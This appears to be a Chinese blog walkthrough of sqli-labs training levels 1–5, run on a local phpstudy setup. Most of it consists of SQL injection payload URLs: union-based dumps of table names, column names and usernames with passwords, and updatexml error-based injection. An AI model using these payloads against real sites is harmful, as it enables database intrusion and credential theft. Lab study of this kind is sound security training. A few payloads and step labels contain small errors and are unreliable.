首页 > 数据库 >sqli-labs靶场通关攻略 1-5

sqli-labs靶场通关攻略 1-5

时间:2024-08-15 19:58:50浏览次数:17  
标签:127.0 http 攻略 Less 0.1 labs sqli --+ id

通过https://github.com/Audi-1/sqli-labs  下载sqli-labs靶场压缩包

把靶场环境放入phpstudy_pro的www里面

输入数据库密码

使用php5.4.45nts版本

输入127.0.0.1点击setup

靶场建立

第一关:less-1

步骤一:根据提示确立攻击点,确定注入参数为id

步骤二:判断闭合方式:id=1' --+

步骤三:判断字段列数 order by

http://127.0.0.1/Less-1/?id=1' order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-1/?id=1' order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常 说明存在3列

步骤四:联合查询 查当前数据库名 数据库用户http://127.0.0.1/Less-1/?id=-1' union select 1,database(),3 --+

步骤五:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七:查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+

第二关 less-2

步骤一:判断闭合方式 id=1 --+

步骤二:判断字段列数 order by

http://127.0.0.1/Less-2/?id=1 order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-2/?id=1 order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-2/?id=1 order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-2/?id=1 order by 4 --+ 页面不正常 说明存在3列

步骤三:联合查询 查当前数据库名 数据库用户http://127.0.0.1/Less-2/?id=-1 union select 1,database(),3 --+

步骤四:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤五:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤六:查询表中所有的数据

http://127.0.0.1/Less-2/?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第三关 less-3

步骤一:判断闭合方式 id=1') --+

步骤二:判断字段列数 order by

http://127.0.0.1/Less-3/?id=1') order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-3/?id=1') order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-3/?id=1')  order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-3/?id=1')  order by 4 --+ 页面不正常 说明存在3列

 步骤三:联合查询 查当前数据库名 数据库用户http://127.0.0.1/Less-3/?id=-1') union select 1,database(),3 --+

步骤四:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤五:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤六:查询表中所有的数据

http://127.0.0.1/Less-3/?id=-1') union select 1,2,group_concat(id,username,password) from users --+

第四关 less-4

步骤一:判断闭合方式 id=1") --+

步骤二:判断字段列数 order by

http://127.0.0.1/Less-4/?id=1") order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-4/?id=1") order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-4/?id=1") order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-4/?id=1") order by 4 --+ 页面不正常 说明存在3列

  步骤三:联合查询 查当前数据库名 数据库用户http://127.0.0.1/Less-4/?id=-1") union select 1,database(),3 --+

步骤四:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

 步骤五:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤六:查询表中所有的数据

http://127.0.0.1/Less-4/?id=-1") union select 1,2,group_concat(id,username,password) from users --+

第五关:less-5

步骤一:根据联合查询发现没有回显数据,输出仍然You are in.........

步骤二:当id=0时,发现有报错行为

步骤三:进行报错注入

127.0.0.1/Less-5/?id=0' and updatexml(1,1,1) --+

127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,,1),1) --+

步骤四:查询当前数据库名

http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select database())),1) --+

步骤五:查询表名

http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

利用group_concat组成一个集合

http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤五:查询列名

http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

步骤六:查具体的username和password

http://127.0.0.1/Less-5/?id=0​​​​​​' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

查询不完整,通过limit一条一条查询

第一条

http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+

第二条http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select username from users limit 2,1)),1)--+

第三条http://127.0.0.1/Less-5/?id=0' and updatexml(1,concat(1,(select username from users limit 3,1)),1)--+

标签:127.0,http,攻略,Less,0.1,labs,sqli,--+,id
From: https://blog.csdn.net/2301_82061181/article/details/141197893

相关文章

  • sqli-labs靶场通关攻略
    SQL注入第一关首先我们进入靶场进入第一关我们要进行sql注入,先得确定此网站的闭合点在网址栏后+ /?id=1 回车判断字段列数orderbyhttp://127.0.0.1/Less-1/?id=1'orderby1--+页面正常说明存在1列http://127.0.0.1/Less-1/?id=1'orderby2--+页面正常......
  • 本地生活服务平台源码在哪里找到?获取全攻略来了!
    随着本地生活的市场前景和收益空间不断显现,各大官方平台的本地生活服务商申请门槛和审核力度以及入局后的考核要求也在持续调高。在此背景下,越来越多的创业者开始想要通过搭建本地生活服务平台源码完成入局,连带着本地生活服务平台源码在哪里找到等相关问题也因此备受关注。而......
  • Flutter项目移动端SQLite升级指南:解决json_extract函数缺失问题
    引言在Flutter移动端项目中依赖于SQLite的高级功能(如json_extract),在低版本的Android系统上部署时,可能会遇到函数不支持的问题。本文将指导你如何通过升级项目中使用的SQLite版本来解决这一问题。前置条件Flutter项目使用sqflite:^2.3.3+1进行SQLite数据库操作。IMBoyA......
  • 短剧CPS系统搭建全攻略:从零到一,详细教程助你快速上手
    目录一、短剧cps是什么?二、短剧cps系统搭建教程1.前端开发2.后端开发4.自动化与持续集成5.数据分析与监控三、部分代码展示 一、短剧cps是什么?短剧CPS系统是一种基于短剧推广的收益分成平台。该系统集成了短剧内容展示、用户观看、付费购买、佣金分成等功能,......
  • 保姆级攻略:企业系统和办公软件上云
    【若您对内容感兴趣,可以联系或关注我们】一、前期准备明确上云目标企业上云的目标多种多样,可能是为了降低成本、提高灵活性、增强安全性,亦或是为了紧跟数字化转型的潮流。明确目标对于后续的规划和决策至关重要。例如,一家小型创业公司由于资金有限,可能主要追求降低IT基础......
  • sqli-labs靶场通关攻略
    一,进入sqli-labs-master靶场第一关,加入参数id.列如:127.0.0.1二.判断SQL注入漏洞--引起报错找到闭合与注释加单引号判断闭合,发现为字符型注入,三.使用orderby判断字段数有几列:3列回显正常,4列出现报错,说明只有3列四.使用unionselect确定回显点五.看到2和3的回显查......
  • 本地生活服务平台源码是什么?成功攻略分享!
    作为当前多家互联网重点布局项目,本地生活已然成为众多创业者心目中理想的创业赛道,本地生活服务商的申请热度更是因此持续飙升。不过,由于各大官方平台对其本地生活服务商的要求日益严苛,让不少创业者在被拒之门外的同时,开始考虑通过本地生活服务平台源码部署这一途径完成入局。......
  • 高效攻略:程序员如何快速上手并精通大模型技术
    探索大模型:职场变革的催化剂在数字化转型的浪潮中,大模型技术正以前所未有的速度改变着职场生态。无论是提升现有服务的智能化程度,还是开辟全新的业务领域,大模型都展现出了无可比拟的优势。对于程序员而言,掌握大模型不仅意味着紧跟技术前沿,更是在职场竞争中占据先机的关键。......
  • 编程入门攻略
    编程小白如何成为大神?大学新生的最佳入门攻略编程已成为当代大学生的必备技能,但面对众多编程语言和学习资源,新生们常常感到迷茫。如何选择适合自己的编程语言?如何制定有效的学习计划?如何避免常见的学习陷阱?让我们一起探讨大学新生入门编程的最佳路径,为你的大学生活和未来职业......
  • Java计算机毕业设计的旅游攻略系统(开题+源码+论文)
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着旅游业的蓬勃发展,人们对于旅行的需求日益多样化与个性化,传统的旅游方式已难以满足现代游客的高效、便捷与深度体验需求。在信息爆炸的时代背景下......